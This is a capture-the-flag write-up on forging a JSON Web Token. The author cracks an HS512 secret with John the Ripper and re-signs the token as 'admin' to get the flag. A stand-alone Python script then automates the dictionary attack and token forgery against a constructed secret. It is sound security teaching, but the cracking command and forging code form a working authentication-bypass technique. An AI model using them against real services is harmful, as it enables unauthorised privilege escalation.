![a27d100cac3b2b079de126924af5342f.png](0674b50ed9ef47ebabc453ce715abf86.png)

Browsing to the site returns an error:

```
{"Error":"Authorization header not found! Try to login with guest credentials."}
```

Navigating to `/login` gives a different error, `Method Not Allowed`, so the endpoint wants something other than a **GET**. I captured the request in **BurpSuite**, changed the request method from **GET** to **POST** and passed in some "guest" credentials.

![41c38e5e342ecaea02f7d5d8defbe893.png](44e4b8e1f9c24effb78b24cb322b35e1.png)

The server sends back a **JSON Web Token**:

```
{"Token":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjIxMDI4MzY2fQ.xqKZlUUHQRTRylg4-EtplinoqbCUpERoVdwXDUur0VHLeeAz1v5IOuekeDvsr3JczO4h6bsH2mN4-MWd9u4jOQ"}
```

Base64url-decoding the first two segments gives the header `{"typ":"JWT","alg":"HS512"}` and the payload `{"username":"guest","exp":1621028366}`, so the third segment is an HMAC-SHA512 over `header.payload`, keyed with a secret only the server knows.

Passing that token in the `Authorization` header of a **GET** request to the webroot `/`:

![9628a047f543ba62f8aeb54a36b92b3b.png](2f43568802f642aa8d3fea85259f6642.png)

gives this response:

```
{"Message":"Hi, guest! You are not admin, I have no secret for you."}
```

The `username` claim decides whether we get the secret, so we need to forge the **JWT** with `"username":"admin"`. Unfortunately the server is not vulnerable to the **Alg None Attack** (setting `"alg":"none"` and dropping the signature), so we need to crack the secret key instead. Because HS512 is a shared-secret scheme, anyone who recovers the key can sign tokens the server will accept. **John the Ripper** will do that for us:

`john jwt.txt --wordlist=/rockyou.txt --format=HMAC-SHA512`

![03cfb49d800f4453352febc222e626ae.png](91d351060c284b129600d310897bc996.png)

Now that we know the key, we can forge the token. I'm using a **BurpSuite** extension called **JSON Web Tokens**.

![efbe5e7219e2a9ec15345f2d2727d9f8.png](6dee81c77d954b1e91b1f6560d8e72a0.png)

Change the **"username"** field to **"admin"**, click **Recalculate Signature** and pop in the secret key that john just found for us. Leave the header and the other claims alone; if the server checks `exp` and the captured token has since expired, log in again as guest and forge a fresh one. Send it off and get the flag!

![fe90a42c9e9d8c887a362f651b0401ad.png](c05f752064f14768adf3009c8e19a7f2.png)

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #jwt #web

Related:
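The whole chain above (decode the captured token, dictionary-attack the HS512 secret the way john does, re-sign with `username` set to `admin`) as an added, stand-alone Python example. It is not code from the original writeup or from the challenge. The guest token copied from the page is only decoded here, since its real secret is not known; the cracking and forging run against a second token signed with a constructed secret (`CONSTRUCTED_SECRET`) and a five-word stand-in for rockyou (`CONSTRUCTED_WORDLIST`). Only the standard library is used.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed example data (not from the original page): a tiny wordlist standing
# in for rockyou.txt, with the constructed secret buried in the middle of it.
CONSTRUCTED_SECRET = "sup3rs3cr3t"
CONSTRUCTED_WORDLIST = ["123456", "password", "letmein", "sup3rs3cr3t", "qwerty"]

# The guest token returned by the challenge server (copied from the page). Its
# secret is NOT known here, so it is only used to demonstrate decoding.
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9."
    "eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjIxMDI4MzY2fQ."
    "xqKZlUUHQRTRylg4-EtplinoqbCUpERoVdwXDUur0VHLeeAz1v5IOuekeDvsr3JczO4h6bsH2mN4-MWd9u4jOQ"
)


def b64url_encode(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet with the '=' padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restore the padding the token omits."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str):
    """Read header and payload WITHOUT checking the signature (recon only)."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def hs512_signature(signing_input: bytes, secret: str) -> bytes:
    """HS512 = HMAC-SHA512 over the ASCII 'header.payload' string."""
    return hmac.new(secret.encode(), signing_input, hashlib.sha512).digest()


def sign_hs512(header: dict, payload: dict, secret: str) -> str:
    """Build an HS512 token the way a server holding the shared secret would."""
    parts = [
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(payload, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(parts).encode("ascii")
    parts.append(b64url_encode(hs512_signature(signing_input, secret)))
    return ".".join(parts)


def verify_hs512(token: str, secret: str) -> bool:
    """Server-side check: recompute the MAC over the token's raw first two segments."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hs512_signature(f"{header_b64}.{payload_b64}".encode("ascii"), secret)
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def crack_hs512(token: str, wordlist) -> Optional[str]:
    """Offline dictionary attack, i.e. what john does with --format=HMAC-SHA512.
    The MAC must be computed over the token's ORIGINAL base64url segments, never
    over re-serialised JSON: any change in key order or whitespace would change
    the signing input and every candidate would fail."""
    for candidate in wordlist:
        if verify_hs512(token, candidate):
            return candidate
    return None


def forge_admin(token: str, secret: str) -> str:
    """Re-sign the captured token with the recovered secret and username=admin.
    The header (typ/alg) and the remaining claims such as exp are kept as-is."""
    header, payload = decode_unverified(token)
    payload = dict(payload, username="admin")
    return sign_hs512(header, payload, secret)


# Constructed guest token, issued with the constructed secret (playing the server).
GUEST_TOKEN = sign_hs512(
    {"typ": "JWT", "alg": "HS512"},
    {"username": "guest", "exp": 1621028366},
    CONSTRUCTED_SECRET,
)

if __name__ == "__main__":
    print("page token decodes to:", decode_unverified(PAGE_TOKEN))
    secret = crack_hs512(GUEST_TOKEN, CONSTRUCTED_WORDLIST)
    print("recovered secret:", secret)
    admin_token = forge_admin(GUEST_TOKEN, secret)
    print("forged token:", admin_token)
    print("server would accept it:", verify_hs512(admin_token, CONSTRUCTED_SECRET))
    print("forged claims:", decode_unverified(admin_token)[1])
```

`verify_hs512` is deliberately the same function the attacker loops over in `crack_hs512`: a symmetric-key JWT has no separate signing key, so the server's verification routine is exactly the oracle a dictionary attack needs. Against the real challenge token you would feed `rockyou.txt` to john (or hashcat mode 16500) rather than this loop, but the signing input and the MAC are identical.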